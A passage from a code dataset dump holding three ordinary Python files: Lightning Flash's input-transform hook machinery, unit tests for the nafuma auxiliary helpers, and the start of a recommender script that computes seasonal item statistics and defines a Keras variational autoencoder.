Dict[RunningStage, _InputTransformPerStage] = {}\n\n # For all the stages possible, set/load the transforms.\n for stage in RunningStage:\n if stage not in INVALID_STAGES_FOR_INPUT_TRANSFORMS:\n self._populate_transforms_for_stage(stage)\n\n def current_transform(self, stage: RunningStage, current_fn: str) -> Callable:\n return self._transform[stage].transforms.get(current_fn, self._identity)\n\n ########################\n # PER SAMPLE TRANSFORM #\n ########################\n\n def per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for all stages stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n pass\n\n def train_per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for the training stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_sample_transform()\n\n def val_per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for the validating stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. 
code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform()\n\n def test_per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for the testing stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_sample_transform()\n\n def predict_per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for the predicting stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform()\n\n def serve_per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for the serving stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform()\n\n ##################################\n # PER SAMPLE TRANSFORM ON DEVICE #\n ##################################\n\n def per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for all stages stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n pass\n\n def train_per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for the training stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_sample_transform_on_device()\n\n def val_per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for the validating stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. 
code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform_on_device()\n\n def test_per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for the testing stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_sample_transform_on_device()\n\n def predict_per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for the predicting stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform_on_device()\n\n def serve_per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for the serving stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def serve_per_sample_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform_on_device()\n\n #######################\n # PER BATCH TRANSFORM #\n #######################\n\n def per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for all stages stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n pass\n\n def train_per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for the training stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_batch_transform()\n\n def val_per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for the validating stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. 
code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform()\n\n def test_per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for the testing stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_batch_transform()\n\n def predict_per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for the predicting stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform()\n\n def serve_per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for the serving stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform()\n\n #################################\n # PER BATCH TRANSFORM ON DEVICE #\n #################################\n\n def per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for all stages stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n pass\n\n def train_per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for the training stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_batch_transform_on_device()\n\n def val_per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for the validating stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. 
code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform_on_device()\n\n def test_per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for the testing stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_batch_transform_on_device()\n\n def predict_per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for the predicting stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform_on_device()\n\n def serve_per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for the serving stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def serve_per_batch_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform_on_device()\n\n ###########\n # COLLATE #\n ###########\n\n def collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of samples to create a batch for all stages.\"\"\"\n return default_collate\n\n def train_collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of training samples to create a training batch.\"\"\"\n return self.collate()\n\n def val_collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of validating samples to create a validating batch.\"\"\"\n return self.collate()\n\n def test_collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of testing samples to create a testing batch.\"\"\"\n return self.collate()\n\n def predict_collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of predicting samples to create a predicting batch.\"\"\"\n return self.collate()\n\n def serve_collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of serving samples to create a serving batch.\"\"\"\n return self.collate()\n\n ########################################\n # HOOKS CALLED INTERNALLY WITHIN FLASH #\n ########################################\n\n def _per_sample_transform(self, sample: Any, stage: RunningStage) -> Any:\n fn = self.current_transform(stage=stage, current_fn=\"per_sample_transform\")\n if isinstance(sample, list):\n return [fn(s) for s in sample]\n return fn(sample)\n\n def _per_batch_transform(self, batch: Any, stage: RunningStage) -> Any:\n \"\"\"Transforms to apply 
to a whole batch (if possible use this for efficiency).\n\n .. note:: This option is mutually exclusive with :meth:`per_sample_transform_on_device`, since if both are\n specified, uncollation has to be applied.\n\n \"\"\"\n return self.current_transform(stage=stage, current_fn=\"per_batch_transform\")(batch)\n\n def _collate(self, samples: Sequence, stage: RunningStage) -> Any:\n \"\"\"Transform to convert a sequence of samples to a collated batch.\"\"\"\n return self.current_transform(stage=stage, current_fn=\"collate\")(samples)\n\n def _per_sample_transform_on_device(self, sample: Any, stage: RunningStage) -> Any:\n \"\"\"Transforms to apply to the data before the collation (per-sample basis).\n\n .. note:: This option is mutually exclusive with :meth:`per_batch_transform`, since if both are\n specified, uncollation has to be applied.\n\n .. note:: This function won't be called within the dataloader workers, since to make that happen each of\n the workers would have to create its own CUDA context, which would pollute GPU memory (if on GPU).\n\n \"\"\"\n fn = self.current_transform(stage=stage, current_fn=\"per_sample_transform_on_device\")\n if isinstance(sample, list):\n return [fn(s) for s in sample]\n return fn(sample)\n\n def _per_batch_transform_on_device(self, batch: Any, stage: RunningStage) -> Any:\n \"\"\"Transforms to apply to a whole batch (if possible use this for efficiency).\n\n .. note:: This function won't be called within the dataloader workers, since to make that happen each of\n the workers would have to create its own CUDA context, which would pollute GPU memory (if on GPU).\n\n \"\"\"\n return self.current_transform(stage=stage, current_fn=\"per_batch_transform_on_device\")(batch)\n\n #############\n # UTILITIES #\n #############\n\n def inject_collate_fn(self, collate_fn: Callable):\n # set the collate function for every applicable stage\n if collate_fn is not default_collate:\n for stage in RunningStage:\n if stage not in [RunningStage.SANITY_CHECKING, RunningStage.TUNING]:\n self._transform[stage].transforms[InputTransformPlacement.COLLATE.value] = collate_fn\n\n def _populate_transforms_for_stage(self, running_stage: RunningStage):\n transform, collate_in_worker = self.__check_transforms(\n transform=self.__resolve_transforms(running_stage),\n )\n\n self._transform[running_stage] = _InputTransformPerStage(\n collate_in_worker=collate_in_worker,\n transforms=transform,\n )\n\n def __resolve_transforms(self, running_stage: RunningStage) -> Optional[Dict[str, Callable]]:\n transforms = {}\n stage = _STAGES_PREFIX[running_stage]\n\n # iterate over all transform hook names\n for transform_name in InputTransformPlacement:\n transform_name = transform_name.value\n\n method_name = f\"{stage}_{transform_name}\"\n\n # get the associated transform\n try:\n fn = getattr(self, method_name)()\n except AttributeError as e:\n raise AttributeError(\n str(e) + \". Make sure you include a call to super().__init__(...) 
in your __init__ after setting \"\n \"all attributes.\"\n )\n\n if fn is None:\n continue\n\n if not callable(fn):\n raise TypeError(f\"The hook {method_name} should return a callable.\")\n\n transforms[transform_name] = fn\n\n return transforms\n\n def __check_transforms(self, transform: Dict[str, Callable]) -> Tuple[Dict[str, Callable], Optional[bool]]:\n is_per_batch_transform_in = \"per_batch_transform\" in transform\n is_per_sample_transform_on_device_in = \"per_sample_transform_on_device\" in transform\n\n if is_per_batch_transform_in and is_per_sample_transform_on_device_in:\n raise TypeError(\n f\"{transform}: `per_batch_transform` and `per_sample_transform_on_device` are mutually exclusive.\"\n )\n\n collate_in_worker: Optional[bool] = not is_per_sample_transform_on_device_in\n\n return transform, collate_in_worker\n\n @staticmethod\n def _identity(x: Any) -> Any:\n return x\n\n def __str__(self) -> str:\n return f\"{self.__class__.__name__}(\" + f\"transform={self._transform})\"\n\n\ndef create_or_configure_input_transform(\n transform: INPUT_TRANSFORM_TYPE,\n transform_kwargs: Optional[Dict] = None,\n) -> Optional[InputTransform]:\n if not transform_kwargs:\n transform_kwargs = {}\n\n if isinstance(transform, InputTransform):\n return transform\n\n if inspect.isclass(transform) and issubclass(transform, InputTransform):\n # Deprecation Warning\n rank_zero_warn(\n \"Please pass an instantiated object of the `InputTransform` class. Passing the Class and keyword arguments\"\n \" separately has been deprecated since v0.8.0 and will be removed in v0.9.0.\",\n stacklevel=8,\n category=FutureWarning,\n )\n return transform(**transform_kwargs)\n\n if isinstance(transform, partial):\n return transform(**transform_kwargs)\n\n if not transform:\n return None\n\n raise ValueError(f\"The format for the transform isn't correct. 
Found {transform}\")\n\n\nclass _InputTransformProcessor:\n \"\"\"\n This class is used to encapsulate the following functions of an `InputTransform` Object:\n Inside a worker:\n per_sample_transform: Function to transform an individual sample\n collate: Function to merge sample into a batch\n per_batch_transform: Function to transform an individual batch\n\n Inside main process:\n per_sample_transform_on_device: Function to transform an individual sample\n collate: Function to merge sample into a batch\n per_batch_transform_on_device: Function to transform an individual batch\n \"\"\"\n\n def __init__(\n self,\n input_transform: InputTransform,\n collate_fn: Callable,\n per_sample_transform: Callable,\n per_batch_transform: Callable,\n stage: RunningStage,\n apply_per_sample_transform: bool = True,\n on_device: bool = False,\n ):\n super().__init__()\n self.input_transform = input_transform\n self.callback = ControlFlow(self.input_transform.callbacks or [])\n self.collate_fn = collate_fn\n self.per_sample_transform = per_sample_transform\n self.per_batch_transform = per_batch_transform\n self.apply_per_sample_transform = apply_per_sample_transform\n self.stage = stage\n self.on_device = on_device\n\n def __call__(self, samples: Sequence[Any]) -> Any:\n if not self.on_device:\n for sample in samples:\n self.callback.on_load_sample(sample, self.stage)\n\n if self.apply_per_sample_transform:\n list_samples = [samples] if not isinstance(samples, list) else samples\n\n transformed_samples = [self.per_sample_transform(sample, self.stage) for sample in list_samples]\n\n for sample in transformed_samples:\n if self.on_device:\n self.callback.on_per_sample_transform_on_device(sample, self.stage)\n else:\n self.callback.on_per_sample_transform(sample, self.stage)\n\n collated_samples = self.collate_fn(transformed_samples, self.stage)\n self.callback.on_collate(collated_samples, self.stage)\n else:\n collated_samples = samples\n\n transformed_collated_samples = self.per_batch_transform(collated_samples, self.stage)\n if self.on_device:\n self.callback.on_per_batch_transform_on_device(transformed_collated_samples, self.stage)\n else:\n self.callback.on_per_batch_transform(transformed_collated_samples, self.stage)\n return transformed_collated_samples\n\n def __str__(self) -> str:\n # todo: define repr function which would take object and string attributes to be shown\n return (\n \"_InputTransformProcessor:\\n\"\n f\"\\t(per_sample_transform): {str(self.per_sample_transform)}\\n\"\n f\"\\t(collate_fn): {str(self.collate_fn)}\\n\"\n f\"\\t(per_batch_transform): {str(self.per_batch_transform)}\\n\"\n f\"\\t(apply_per_sample_transform): {str(self.apply_per_sample_transform)}\\n\"\n f\"\\t(on_device): {str(self.on_device)}\\n\"\n f\"\\t(stage): {str(self.stage)}\"\n )\n\n\ndef __make_collates(input_transform: InputTransform, on_device: bool, collate: Callable) -> Tuple[Callable, Callable]:\n \"\"\"Returns the appropriate collate functions based on whether the transforms happen in a DataLoader worker or on the\n device (main process).\"\"\"\n if on_device:\n return input_transform._identity, collate\n return collate, input_transform._identity\n\n\ndef __configure_worker_and_device_collate_fn(\n running_stage: RunningStage, input_transform: InputTransform\n) -> Tuple[Callable, Callable]:\n transform_for_stage: _InputTransformPerStage = input_transform._transform[running_stage]\n\n worker_collate_fn, device_collate_fn = __make_collates(\n input_transform, not transform_for_stage.collate_in_worker, 
input_transform._collate\n )\n\n return worker_collate_fn, device_collate_fn\n\n\ndef create_worker_input_transform_processor(\n running_stage: RunningStage, input_transform: InputTransform\n) -> _InputTransformProcessor:\n \"\"\"This utility creates the worker-side `_InputTransformProcessor` object, which contains the transforms used as\n the DataLoader `collate_fn`.\"\"\"\n worker_collate_fn, _ = __configure_worker_and_device_collate_fn(\n running_stage=running_stage, input_transform=input_transform\n )\n return _InputTransformProcessor(\n input_transform,\n worker_collate_fn,\n input_transform._per_sample_transform,\n input_transform._per_batch_transform,\n running_stage,\n )\n\n\ndef create_device_input_transform_processor(\n running_stage: RunningStage, input_transform: InputTransform\n) -> _InputTransformProcessor:\n \"\"\"This utility creates the device-side `_InputTransformProcessor` object, which contains the transforms used in\n the DataModule `on_after_batch_transfer` hook.\"\"\"\n _, device_collate_fn = __configure_worker_and_device_collate_fn(\n running_stage=running_stage, input_transform=input_transform\n )\n return _InputTransformProcessor(\n input_transform,\n device_collate_fn,\n input_transform._per_sample_transform_on_device,\n input_transform._per_batch_transform_on_device,\n running_stage,\n apply_per_sample_transform=device_collate_fn != input_transform._identity,\n on_device=True,\n )\n","repo_name":"Lightning-Universe/lightning-flash","sub_path":"src/flash/core/data/io/input_transform.py","file_name":"input_transform.py","file_ext":"py","file_size_in_byte":30739,"program_lang":"python","lang":"en","doc_type":"code","stars":1717,"dataset":"github-code","pt":"7"}
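A minimal subclass sketch tying the hooks above together (illustrative only: Flash must be installed for the imports to resolve, and `scale_to_unit` is a made-up callable standing in for any per-sample transform):

    from typing import Callable

    from flash.core.data.io.input_transform import InputTransform
    from flash.core.data.transforms import ApplyToKeys


    def scale_to_unit(x):
        # toy per-sample transform: map 0-255 pixel values into [0, 1]
        return x / 255.0


    class MyInputTransform(InputTransform):
        # runs on every sample, in the DataLoader workers, for all stages
        def per_sample_transform(self) -> Callable:
            return ApplyToKeys("input", scale_to_unit)

        # a stage-prefixed hook overrides the generic one for that stage only
        def train_per_sample_transform(self) -> Callable:
            return ApplyToKeys("input", scale_to_unit)

Because `per_batch_transform` and `per_sample_transform_on_device` are mutually exclusive (enforced by `__check_transforms` above), a subclass should override at most one of the two for any given stage.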
+{"seq_id":"26906075940","text":"import nafuma.auxillary as aux\nimport os\n\ndef test_swap_values():\n\n\n test_dict = {'test1': 1, 'test2': 2}\n key1 = 'test1'\n key2 = 'test2'\n\n oldval1 = test_dict[key1]\n oldval2 = test_dict[key2]\n\n new_dict = aux.swap_values(options=test_dict, key1=key1, key2=key2) \n\n assert (test_dict[key1] == oldval2) and (test_dict[key2] == oldval1)\n\n\ndef test_ceil() -> None:\n\n assert aux.ceil(1.05, 0.5) == 1.5\n assert aux.ceil(1.05, 1) == 2.0\n assert aux.ceil(1.1, 0.2) == 1.2\n\n\ndef test_floor() -> None:\n\n assert aux.floor(2.02, 1) == 2.0\n assert aux.floor(2.02, 0.01) == 2.02\n assert aux.floor(2.013, 0.01) == 2.01\n\n\n\ndef test_options() -> None:\n\n\n options = {}\n\n default_options = {\n 'test1': 1,\n 'test2': 2, \n 'test3': 3,\n 'test4': 4,\n 'test5': 5,\n }\n\n\n options = aux.update_options(options=options, default_options=default_options)\n\n assert options['test1'] == default_options['test1']\n\n\ndef test_save_options() -> None:\n \n options = {'test1': 1, 'test2': 2}\n path = 'tmp.dat'\n\n aux.save_options(options, path)\n\n assert os.path.isfile(path)\n\n os.remove(path)\n\n\ndef test_load_options() -> None:\n \n options = {'test1': 1, 'test2': 2}\n path = 'tmp.dat'\n\n aux.save_options(options, path)\n\n loaded_options = aux.load_options(path)\n\n assert (loaded_options['test1'] == 1) and (loaded_options['test2'] == 2)\n\n os.remove(path)\n","repo_name":"rasmusthog/nafuma","sub_path":"nafuma/test/test_auxillary.py","file_name":"test_auxillary.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"6319021647","text":"import math\nimport os\n\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nimport tensorflow as tf\nfrom tensorflow import keras\nimport keras.backend as K\n\nfrom RecSys_Course_AT_PoliMi.Pipeline.data_extraction import get_dataframes\n\ntqdm.pandas()\n\n\ndef compute_mean(x, y):\n if y != 0:\n return x / y\n else:\n return -1\n\n\ndef compute_quartet_entropy(wi, sp, su, au):\n total = wi + sp + su + au\n if total == 0:\n return -1\n if wi == 0:\n wi_coeff = 0\n else:\n wi_coeff = - (wi / total) * math.log2(wi / total)\n if sp == 0:\n sp_coeff = 0\n else:\n sp_coeff = - (sp / total) * math.log2(sp / total)\n if su == 0:\n su_coeff = 0\n else:\n su_coeff = - (su / total) * math.log2(su / total)\n if au == 0:\n au_coeff = 0\n else:\n au_coeff = - (au / total) * math.log2(au / total)\n return 1 - ((wi_coeff + sp_coeff + su_coeff + au_coeff) / 2)\n\n\ndef compute_season(x, record):\n month = x.date.month\n elems = record[x.item_id]\n if month in [12, 1, 2]:\n elems[0] += 1\n elif month in [3, 4, 5]:\n elems[1] += 1\n elif month in [6, 7, 8]:\n elems[2] += 1\n else:\n elems[3] += 1\n\n\ndef compute_seasonality_tendency(df, attributes):\n print('Computing Seasonality Tendency...')\n assert len(attributes) == 4\n return df.progress_apply(lambda x:\n compute_quartet_entropy(x[attributes[0]], x[attributes[1]],\n x[attributes[2]], x[attributes[3]]),\n axis=1)\n\n\ndef compute_season_tendency(df, target, columns):\n assert target in columns\n print('Computing {} Tendency...'.format(target))\n return df.progress_apply(lambda x:\n compute_mean(x[target],\n x[columns[0]] + x[columns[1]] +\n x[columns[2]] + x[columns[3]]),\n axis=1)\n\n\ndef extract_season(sessions, item_features, columns, attr_type='views'):\n assert type(attr_type) == str\n assert len(columns) == 4\n sessions.date = pd.to_datetime(sessions.date)\n record = {item: [0, 0, 0, 0] for item in item_features.item_id.unique()}\n\n print('Building Statistics...')\n sessions.progress_apply(lambda x: compute_season(x, record), axis=1)\n season_df = pd.DataFrame.from_dict(record, orient='index', columns=columns)\n season_df['seasonality_' + attr_type + '_tendency'] = compute_seasonality_tendency(season_df, columns)\n season_df[columns[0] + '_tendency'] = compute_season_tendency(season_df, columns[0], columns)\n season_df[columns[1] + '_tendency'] = compute_season_tendency(season_df, columns[1], columns)\n season_df[columns[2] + '_tendency'] = compute_season_tendency(season_df, columns[2], columns)\n season_df[columns[3] + '_tendency'] = compute_season_tendency(season_df, columns[3], columns)\n return season_df\n\n\ndef get_item_attributes(dataset_path, path, init_date='2020-01-01', end_date='2021-05-31', use_base_features=False):\n \"\"\"\n init_date is inclusive\n end_date is exclusive\n dataset_path is the relative path to the Dataset directory to pass to get_dataframes\n path is the name of the file to load/create (if not present it will create a file\n with name 'path_init_date_end_date.csv')\n When use_base_features is True creates simil-one-hot-encoding based on original dataset features\n \"\"\"\n path = path.split('.csv')[0] + '_' + init_date.replace('-', '_') + '_' + end_date.replace('-', '_') + '.csv'\n if os.path.exists(path):\n print('Attributes already computed, reloading...')\n return pd.read_csv(path)\n print('Attributes not computed, creating...')\n item_features_df, train_sessions_df, train_purchases_df, test_sessions_df, candidate_items_df = get_dataframes(\n dataset_path)\n 
train_sessions_df = train_sessions_df[(train_sessions_df.date >= init_date) & (train_sessions_df.date < end_date)]\n train_purchases_df = train_purchases_df[\n (train_purchases_df.date >= init_date) & (train_purchases_df.date <= end_date)]\n\n columns_views = ['winter_views', 'spring_views', 'summer_views', 'autumn_views']\n season_views_df = extract_season(train_sessions_df, item_features_df, columns_views, 'views')\n columns_purchases = ['winter_purchases', 'spring_purchases', 'summer_purchases', 'autumn_purchases']\n season_purchases_df = extract_season(train_purchases_df, item_features_df, columns_purchases, 'purchases')\n\n season_df = season_views_df.merge(right=season_purchases_df, left_index=True, right_index=True)\n season_df.insert(0, 'item_id', season_df.index)\n\n season_df['total_views'] = season_df.apply(lambda x: x[columns_views[0]] + x[columns_views[1]] +\n x[columns_views[2]] + x[columns_views[3]], axis=1)\n season_df['total_purchases'] = season_df.apply(lambda x: x[columns_purchases[0]] + x[columns_purchases[1]] +\n x[columns_purchases[2]] + x[columns_purchases[3]], axis=1)\n\n if use_base_features:\n item_features_unstack = simil_one_hot_mapping(item_features_df, 'feature_category_id',\n 'feature_value_id', 'item_id')\n season_df = item_features_unstack.merge(right=season_df, left_on='item_id', right_on='item_id')\n season_df.reset_index(inplace=True)\n season_df.drop(columns=['index'], inplace=True)\n\n season_df.to_csv(path, index=False)\n return season_df\n\n\nclass VariationalAutoEncoder(keras.Model):\n def __init__(self, inputShape, batchSize, latentSize):\n super(VariationalAutoEncoder, self).__init__()\n self.inputShape = inputShape\n self.batchSize = batchSize\n self.latentSize = latentSize\n self.input_layer = keras.Input(shape=self.inputShape)\n self.e2 = keras.layers.Dense(units=self.latentSize * 4)(self.input_layer)\n self.b2 = tf.keras.layers.BatchNormalization()(self.e2)\n self.r2 = tf.keras.layers.LeakyReLU(alpha=0.3)(self.b2)\n self.d2 = tf.keras.layers.Dropout(0.2, seed=42)(self.r2)\n self.z_mean = keras.layers.Dense(self.latentSize)(self.d2)\n self.z_log_sigma = keras.layers.Dense(self.latentSize)(self.d2)\n self.z = keras.layers.Lambda(self.sampling)([self.z_mean, self.z_log_sigma])\n self.encoder = keras.Model(self.input_layer, [self.z_mean, self.z_log_sigma, self.z], 